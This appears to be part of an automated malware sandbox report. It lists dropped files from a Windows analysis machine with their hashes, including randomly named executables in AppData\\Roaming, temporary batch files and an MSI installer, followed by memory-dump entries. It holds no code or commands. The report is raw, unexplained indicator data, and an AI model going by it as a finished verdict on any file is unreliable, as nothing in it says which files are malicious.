C:\Program Files\nodejs\node_modules\npm\node_modules\@sigstore\tuf\LICENSE
Filesize
11KB

MD5
dfc1b916d4555a69859202f8bd8ad40c

SHA1
fc22b6ee39814d22e77fe6386c883a58ecac6465

SHA256
7b0ce3425a26fdba501cb13508af096ade77e4036dd2bd8849031ddecf64f7c9

SHA512
1fbe6bb1f60c8932e4dcb927fc8c8131b9c73afd824ecbabc2045e7af07b35a4155a0f8ad3103bf25f192b6d59282bfc927aead3cb7aaeb954e1b6dbd68369fa

Download Submit
C:\Program Files\nodejs\node_modules\npm\node_modules\@sigstore\verify\dist\shared.types.js
Filesize
79B

MD5
24563705cc4bb54fccd88e52bc96c711

SHA1
871fa42907b821246de04785a532297500372fc7

SHA256
ef1f170ad28f2d870a474d2f96ae353d770fff5f20e642cd8f9b6f1d7742df13

SHA512
2ce8d2cf580623358fef5f4f8925d0c9943a657c2503c80048ca789bf16eacdb980bfc8aaaa50101a738e939926fcf2545500484dcad782c700ee206d8c6f9b9

Download Submit
C:\Program Files\nodejs\node_modules\npm\node_modules\bin-links\LICENSE
Filesize
754B

MD5
d2cf52aa43e18fdc87562d4c1303f46a

SHA1
58fb4a65fffb438630351e7cafd322579817e5e1

SHA256
45e433413760dc3ae8169be5ed9c2c77adc31ad4d1bc5a28939576df240f29a0

SHA512
54e33d7998b5e9ba76b2c852b4d0493ebb1b1ee3db777c97e6606655325ff66124a0c0857ca4d62de96350dbaee8d20604ec22b0edc17b472086da4babbbcb16

Download Submit
C:\Program Files\nodejs\node_modules\npm\node_modules\chalk\license
Filesize
1KB

MD5
b862aeb7e1d01452e0f07403591e5a55

SHA1
b8765be74fea9525d978661759be8c11bab5e60e

SHA256
fcf1a18be2e25ba82acf2c59821b030d8ee764e4e201db6ef3c51900d385515f

SHA512
885369fe9b8cb0af1107ee92b52c6a353da7cf75bc86abb622e2b637c81e9c5ffe36b0ac74e11cfb66a7a126b606fe7a27e91f3f4338954c847ed2280af76a5f

Download Submit
C:\Program Files\nodejs\node_modules\npm\node_modules\env-paths\license
Filesize
1KB

MD5
5ad87d95c13094fa67f25442ff521efd

SHA1
01f1438a98e1b796e05a74131e6bb9d66c9e8542

SHA256
67292c32894c8ac99db06ffa1cb8e9a5171ef988120723ebe673bf76712260ec

SHA512
7187720ccd335a10c9698f8493d6caa2d404e7b21731009de5f0da51ad5b9604645fbf4bc640aa94513b9eb372aa6a31df2467198989234bc2afbce87f76fbc3

Download Submit
C:\Program Files\nodejs\node_modules\npm\node_modules\gauge\LICENSE.md
Filesize
818B

MD5
2916d8b51a5cc0a350d64389bc07aef6

SHA1
c9d5ac416c1dd7945651bee712dbed4d158d09e1

SHA256
733dcbf5b1c95dc765b76db969b998ce0cbb26f01be2e55e7bccd6c7af29cb04

SHA512
508c5d1842968c478e6b42b94e04e0b53a342dfaf52d55882fdcfe02c98186e9701983ab5e9726259fba8336282e20126c70d04fc57964027586a40e96c56b74

Download Submit
C:\Program Files\nodejs\node_modules\npm\node_modules\ignore-walk\LICENSE
Filesize
780B

MD5
b020de8f88eacc104c21d6e6cacc636d

SHA1
20b35e641e3a5ea25f012e13d69fab37e3d68d6b

SHA256
3f24d692d165989cd9a00fe35ca15a2bc6859e3361fa42aa20babd435f2e4706

SHA512
4220617e29dd755ad592295bc074d6bc14d44a1feeed5101129669f3ecf0e34eaa4c7c96bbc83da7352631fa262baab45d4a370dad7dabec52b66f1720c28e38

Download Submit
C:\Program Files\nodejs\node_modules\npm\node_modules\libnpmsearch\LICENSE
Filesize
730B

MD5
072ac9ab0c4667f8f876becedfe10ee0

SHA1
0227492dcdc7fb8de1d14f9d3421c333230cf8fe

SHA256
2ef361317adeda98117f14c5110182c28eae233af1f7050c83d4396961d14013

SHA512
f38fd6506bd9795bb27d31f1ce38b08c9e6f1689c34fca90e9e1d5194fa064d1f34a9c51d15941506ebbbcd6d4193055e9664892521b7e39ebcd61c3b6f25013

Download Submit
C:\Program Files\nodejs\node_modules\npm\node_modules\minizlib\node_modules\minipass\LICENSE
Filesize
802B

MD5
d7c8fab641cd22d2cd30d2999cc77040

SHA1
d293601583b1454ad5415260e4378217d569538e

SHA256
04400db77d925de5b0264f6db5b44fe6f8b94f9419ad3473caaa8065c525c0be

SHA512
278ff929904be0c19ee5fb836f205e3e5b3e7cec3d26dd42bbf1e7e0ca891bf9c42d2b28fce3741ae92e4a924baf7490c7c6c59284127081015a82e2653e0764

Download Submit
C:\Program Files\nodejs\node_modules\npm\node_modules\minizlib\node_modules\minipass\index.js
Filesize
16KB

MD5
bc0c0eeede037aa152345ab1f9774e92

SHA1
56e0f71900f0ef8294e46757ec14c0c11ed31d4e

SHA256
7a395802fbe01bb3dc8d09586e0864f255874bf897378e546444fbaec29f54c5

SHA512
5f31251825554bf9ed99eda282fa1973fcec4a078796a10757f4fb5592f2783c4ebdd00bdf0d7ed30f82f54a7668446a372039e9d4589db52a75060ca82186b3

Download Submit
C:\Program Files\nodejs\node_modules\npm\node_modules\minizlib\node_modules\minipass\package.json
Filesize
1KB

MD5
d116a360376e31950428ed26eae9ffd4

SHA1
192b8e06fb4e1f97e5c5c7bf62a9bff7704c198b

SHA256
c3052bd85910be313e38ad355528d527b565e70ef15a784db3279649eee2ded5

SHA512
5221c7648f4299234a4637c47d3f1eb5e147014704913bc6fdad91b9b6a6ccc109bced63376b82b046bb5cad708464c76fb452365b76dbf53161914acf8fb11a

Download Submit
C:\Program Files\nodejs\node_modules\npm\node_modules\promise-call-limit\LICENSE
Filesize
763B

MD5
7428aa9f83c500c4a434f8848ee23851

SHA1
166b3e1c1b7d7cb7b070108876492529f546219f

SHA256
1fccd0ad2e7e0e31ddfadeaf0660d7318947b425324645aa85afd7227cab52d7

SHA512
c7f01de85f0660560206784cdf159b2bdc5f1bc87131f5a8edf384eba47a113005491520b0a25d3cc425985b5def7b189e18ff76d7d562c434dc5d8c82e90cce

Download Submit
C:\Program Files\nodejs\node_modules\npm\node_modules\promise-call-limit\dist\commonjs\package.json
Filesize
28B

MD5
56368b3e2b84dac2c9ed38b5c4329ec2

SHA1
f67c4acef5973c256c47998b20b5165ab7629ed4

SHA256
58b55392b5778941e1e96892a70edc12e2d7bb8541289b237fbddc9926ed51bd

SHA512
d662bff3885118e607079fcbeedb27368589bc0ee89f90b9281723fa08bda65e5a08d9640da188773193c0076ec0a5c92624673a6a961490be163e2553d6f482

Download Submit
C:\Program Files\nodejs\node_modules\npm\node_modules\promise-call-limit\dist\esm\package.json
Filesize
26B

MD5
2324363c71f28a5b7e946a38dc2d9293

SHA1
7eda542849fb3a4a7b4ba8a7745887adcade1673

SHA256
1bf0e53fc74b05f1aade7451fbac72f1944b067d4229d96bae7a225519a250e4

SHA512
7437cf8f337d2562a4046246fbfcc5e9949f475a1435e94efbc4b6a55880050077d72692cbc3413e0ccd8f36adf9956a6cc633a2adc85fbff6c4aa2b8edac677

Download Submit
C:\Program Files\nodejs\node_modules\npm\node_modules\wrap-ansi\node_modules\emoji-regex\es2015\index.js
Filesize
17KB

MD5
cf8f16c1aa805000c832f879529c070c

SHA1
54cc4d6c9b462ad2de246e28cd80ed030504353d

SHA256
77f404d608e2a98f2a038a8aa91b83f0a6e3b4937e5de35a8dae0c23aa9ee573

SHA512
a786e51af862470ae46ad085d33281e45795c24897e64b2c4b265302fa9cbfa47b262ec188adbc80d51cfc6ba395b500c0d7f5d343ca4fc2b828eaedba4bd29a

Download Submit
C:\Program Files\nodejs\node_modules\npm\node_modules\wrap-ansi\node_modules\emoji-regex\index.js
Filesize
15KB

MD5
9841536310d4e186a474dfa2acf558cd

SHA1
33fabbcc5e1adbe0528243eafd36e5d876aaecaa

SHA256
5b3c0ac6483d83e6c079f9ffd1c7a18e883a9aaeaedb2d65dd9d5f78153476b9

SHA512
b67680a81bb4b62f959ba66476723eb681614925f556689e4d7240af8216a49f0d994c31381bf6a9489151d14ed8e0d0d4d28b66f02f31188059c9b24aaa3783

Download Submit
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Node.js\Node.js documentation.url
Filesize
168B

MD5
1c1f6159630c170b596af7c9085f8bb0

SHA1
ac26cfe43e10a9f76aee943f9ceff3dc77df29fd

SHA256
61403502b3d584ab749a417955dda3d6c956e64109cc4ac4e46e44b462b7c4f0

SHA512
f93d2e86c287ed4e50a0c00bcd9594c322cfbd0507bbd191d97c7dd2881850296986139df9580ba1bbaae8abab284335db64c41f6edde441e34fa56b934c3046

Download Submit
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Node.js\Node.js website.url
Filesize
133B

MD5
35b86e177ab52108bd9fed7425a9e34a

SHA1
76a1f47a10e3ab829f676838147875d75022c70c

SHA256
afaa6c6335bd3db79e46fb9d4d54d893cee9288e6bb4738294806a9751657319

SHA512
3c8047c94b789c8496af3c2502896cef2d348ee31618893b9b71244af667ec291dcb9b840f869eb984624660086db0c848d1846aa601893e6f9955e56da19f62

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
Filesize
3KB

MD5
91897de07fcb115c5f42cf4c7a984982

SHA1
4903ea814fed6c31b62b394cc9eb024d107b1834

SHA256
bb34e4a3e0dd9623e77f569dbd0093b19dd43e91bb911dc7758e09fb4a53f789

SHA512
54fbd604758c7bc66151018d18bdb140d26e8dcc5d03e974197b0f3b63946eb338bf323f80b4a3e02fd109337cc1c7c8389eb15b17e0d55fced35a0398efcf4b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Explorer\thumbcache_idx.db
Filesize
14KB

MD5
b51d17861145bcecd69e82643f8c294e

SHA1
416311ba870526ffe1ee667c5a0dcb161c4f8b22

SHA256
dc121a9a0235722d6e63fe1a87973b302c4a4519262411a3ccec350504486f9c

SHA512
e416f81a598b5780e8cd9f9c0b6beeeb58803f6a86ac52d1af6dc74864d0d7a7c31b54cf19e921d86cce6992e05820ae81ce8ac25a3cb3334e9fd67ac89511eb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
330b48159b1024ecb330321e1df64464

SHA1
1f3eab97be08e853636a8e41a28ea635bc3362ea

SHA256
e5a0bcb906967f7350dd828e49e990013b3398e45728343eb22d6b50584c96c2

SHA512
bd1ca43a1d10e20a128974a3c85a7b94058564f0cd0f7844b087e29d3ca33544c8660152c0ea5ab1fae6c8506306f3141b4913f658e8cf20bb4cf27cd953e298

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
4c13fec1b6396ff108900330ba8b56de

SHA1
e746ced67410d63ed3a06a992ecfe5704234ebe8

SHA256
573cf210e58b17db814b36b74f390a26da075eb69711580a28bffe5fb4b2a777

SHA512
e3aab376630f420119c0c3d896d2a81259b4d34f2c2de84d3d4f4340217816debe10b8738c9a8c09afcfac200cb92ffe46e2cb5d03ccbd698f6bd6489df1d079

Download Submit
C:\Users\Admin\AppData\Local\Temp\7FDE.tmp\7FDF.tmp\7FE0.bat
Filesize
6KB

MD5
b5d0441990b0eb32503744dc54199f44

SHA1
ff62e8b4ffb31d7d441fa65f8603946a2c0fea7a

SHA256
05bea0edc97f37ea1fb3d4ed27b1c8a372918338e98855f45cdd414d7777fc1c

SHA512
a698b650a94eba4a99336c2afa472ccc89bc22c50ee486f8cdffd96c77935bae2180166eac99e6aa5ca86a1c784259ad13311a5404a2df889d392f34139fcff5

Download Submit
C:\Users\Admin\AppData\Local\Temp\802C.tmp\802D.tmp\802E.bat
Filesize
1KB

MD5
c767a4ce4fc8d490fb2af1daa95a84c6

SHA1
a198c337f2f3eac7ea75ed82f6a765e2f8bcda92

SHA256
c2fdf52cc1547c64a984e5e04b13d2fbd4a8e7b4c8f7d738f1c8618c9fe0613c

SHA512
cbcc782ea2af0594ed15cfcf243d22da61d27b63ec7e6dc6f394c891efd398fc64690dbeb944213c7f8f8d6589e75adc8f55c87aec8515422d51ccc5a479851f

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_satb4bzd.52e.ps1
Filesize
1B

MD5
c4ca4238a0b923820dcc509a6f75849b

SHA1
356a192b7913b04c54574d18c28d46e6395428ab

SHA256
6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

SHA512
4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

Download Submit
C:\Users\Admin\AppData\Roaming\hdsre0ck.3sb0.exe
Filesize
94KB

MD5
6460dff2e792fd74bfc7db3d8c747a58

SHA1
5a395e8f069c17b3f9cfd6a663ca60512b628142

SHA256
1656c23a4f17b821d523293ff4ba84b2c66a11db761782a774dd47b4c8c7667f

SHA512
808ba395708c5d0a4ebe4ca8d1a4f2011abae61c0d2a36f84af7d097ddba7262c220def4fbfc86881db52b0189f008c5f7de39574f26b3bdfb2e5b10c29eb1a9

Download Submit
C:\Users\Admin\AppData\Roaming\hdsre0ck.3sb1.exe
Filesize
88KB

MD5
c4b307c1aeca9d40de4b8ef5a7299c85

SHA1
ea7e1d5a5ef83a0f2ce119a56b441493dd1dd5bd

SHA256
56374adc264aa171a8804dbc071ec959f71d54aeefd824d16e2a2e7a427cecac

SHA512
2fce556f6ac9d005dd62907e5c852a91a0b7f777f68a1946a3ceb27440a4457de3952e25dd2e35e62474fe8ab0df1cb10a2a92b699fec776364bec54d4565bfb

Download Submit
C:\Users\Admin\AppData\Roaming\hdsre0ck.3sb2.exe
Filesize
355KB

MD5
c93d65bc0ed7ee88d266b4be759301f8

SHA1
8c0c415ba824737c61904676e7132094f5710099

SHA256
f9d1a3b43fdeca1691af785f6bdfb445c224e46e58be9d27ba4d77801ef2183f

SHA512
7a66f73d0d4ebd3eb160f87842883d427a3a85a75cb716db96b27670f2c96e75bf396fa2ac65f05413c1a7f16d961d242676320228e1d0c805318a88236f55f1

Download Submit
C:\Users\Admin\AppData\Roaming\hdsre0ck.3sb3.exe
Filesize
5.2MB

MD5
f55fc8c32bee8f7b2253298f0a0012ba

SHA1
574c7a8f3eb378c03f58bc96252769296b20970e

SHA256
cf3389f2b5fb30f790542cd05deb5cb3b9bb10f828b8822cce1c0b83da9d6eb9

SHA512
c956fb150b34d3928eed545644cbf7914e7db3b079d4f260b9f40bf62aaf4432b4cdfd32c99abc9cd7ca79e66d0751d4a30c47087c39a38865b69dc877ac8f2a

Download Submit
C:\Users\Admin\AppData\Roaming\hdsre0ck.3sb4.exe
Filesize
9.5MB

MD5
b8c70bbe49951cb98becf2fc0bce3b7b

SHA1
9c22bea97baabb2b9a216a9cd2fce6b090338b06

SHA256
2835b997c97408baa0da7326c63278207bcb5637f6ecb2ba70b3036092e96bc6

SHA512
6b305a8a12f2ddc43af26869c9660007a190bae263f52efc7c7c398aa0756bb49087ab308270634171cc85d12506b310c28b1b63bcd7bc7f6477931f9a6edfb4

Download Submit
C:\Windows\Installer\MSI432.tmp
Filesize
390KB

MD5
80bebea11fbe87108b08762a1bbff2cd

SHA1
a7ec111a792fd9a870841be430d130a545613782

SHA256
facf518f88cd67afd959c99c3ba233f78a4fbfe7fd3565489da74a585b55e9d1

SHA512
a760debb2084d801b6381a0e1dcef66080df03a768cc577b20b8472be87ad8477d59c331159555de10182d87340aa68fe1f3f5d0212048fd7692d85f4da656f6

Download Submit
C:\Windows\Installer\e58db5b.msi
Filesize
25.3MB

MD5
0df081aa47e7159e585488a161a97466

SHA1
2dc9a592dbb208624aff11a57f97bea89a315973

SHA256
20c578361911d7b0cf153b293b025970eca383a2c802e0df438ac254aaca165d

SHA512
2e1b58add6a714281f2ddeb936069c0eb8ce24ae2e440941379c4273afd7f1a96b162d5b88211e8678804bad652e48c99a4993e0e0d0da4d1abd7550d397e836

Download Submit
memory/580-234-0x00007FF95AFC0000-0x00007FF95AFD0000-memory.dmp

Filesize
64KB

Download
memory/580-233-0x0000028AD36D0000-0x0000028AD36FB000-memory.dmp

Filesize
172KB

Download
memory/580-231-0x0000028AD36A0000-0x0000028AD36C4000-memory.dmp

Filesize
144KB

Download
memory/636-237-0x00007FF95AFC0000-0x00007FF95AFD0000-memory.dmp

Filesize
64KB

Download
memory/636-236-0x000002287EDD0000-0x000002287EDFB000-memory.dmp

Filesize
172KB

Download
memory/1008-242-0x00000272CA420000-0x00000272CA44B000-memory.dmp

Filesize
172KB

Download
memory/1008-243-0x00007FF95AFC0000-0x00007FF95AFD0000-memory.dmp

Filesize
64KB

Download
memory/1060-7-0x000001F3E2B40000-0x000001F3E2B62000-memory.dmp

Filesize
136KB

Download
memory/1060-108-0x00007FF97EED0000-0x00007FF97F8BC000-memory.dmp

Filesize
9.9MB

Download
memory/1060-13-0x000001F3E2D00000-0x000001F3E2D76000-memory.dmp

Filesize
472KB

Download
memory/1060-9-0x00007FF97EED0000-0x00007FF97F8BC000-memory.dmp

Filesize
9.9MB

Download
memory/1060-12-0x00007FF97EED0000-0x00007FF97F8BC000-memory.dmp

Filesize
9.9MB

Download
memory/1060-8-0x00007FF97EED0000-0x00007FF97F8BC000-memory.dmp

Filesize
9.9MB

Download
memory/1060-42-0x00007FF97EED0000-0x00007FF97F8BC000-memory.dmp

Filesize
9.9MB

Download
memory/1060-53-0x00007FF97EED0000-0x00007FF97F8BC000-memory.dmp

Filesize
9.9MB

Download
memory/3328-0-0x00000000001F0000-0x00000000001F8000-memory.dmp

Filesize
32KB

Download
memory/3328-1-0x00007FF97EED3000-0x00007FF97EED4000-memory.dmp

Filesize
4KB

Download
memory/4940-4787-0x00000215CDE20000-0x00000215CE5C6000-memory.dmp

Filesize
7.6MB

Download
memory/4996-166-0x0000000002B30000-0x0000000002B39000-memory.dmp

Filesize
36KB

Download
memory/4996-172-0x0000000077430000-0x00000000775F2000-memory.dmp

Filesize
1.8MB

Download
memory/4996-170-0x00007FF99AF30000-0x00007FF99B10B000-memory.dmp

Filesize
1.9MB

Download
memory/4996-169-0x0000000004850000-0x0000000004C50000-memory.dmp

Filesize
4.0MB

Download
memory/5028-162-0x0000000003CE0000-0x00000000040E0000-memory.dmp

Filesize
4.0MB

Download
memory/5028-94-0x00000000003D0000-0x000000000043D000-memory.dmp

Filesize
436KB

Download
memory/5028-161-0x0000000003CE0000-0x00000000040E0000-memory.dmp

Filesize
4.0MB

Download
memory/5028-163-0x00007FF99AF30000-0x00007FF99B10B000-memory.dmp

Filesize
1.9MB

Download
memory/5028-167-0x00000000003D0000-0x000000000043D000-memory.dmp

Filesize
436KB

Download
memory/5028-165-0x0000000077430000-0x00000000775F2000-memory.dmp

Filesize
1.8MB

Download
memory/5036-225-0x00007FF99AF30000-0x00007FF99B10B000-memory.dmp

Filesize
1.9MB

Download
memory/5036-226-0x00007FF998490000-0x00007FF99853E000-memory.dmp

Filesize
696KB

Download
memory/5036-219-0x0000000140000000-0x000000014002B000-memory.dmp

Filesize
172KB

Download
memory/5036-221-0x0000000140000000-0x000000014002B000-memory.dmp

Filesize
172KB

Download
memory/5036-220-0x0000000140000000-0x000000014002B000-memory.dmp

Filesize
172KB

Download
memory/5036-222-0x0000000140000000-0x000000014002B000-memory.dmp

Filesize
172KB

Download
memory/5036-224-0x0000000140000000-0x000000014002B000-memory.dmp

Filesize
172KB

Download
memory/5036-228-0x0000000140000000-0x000000014002B000-memory.dmp

Filesize
172KB

Download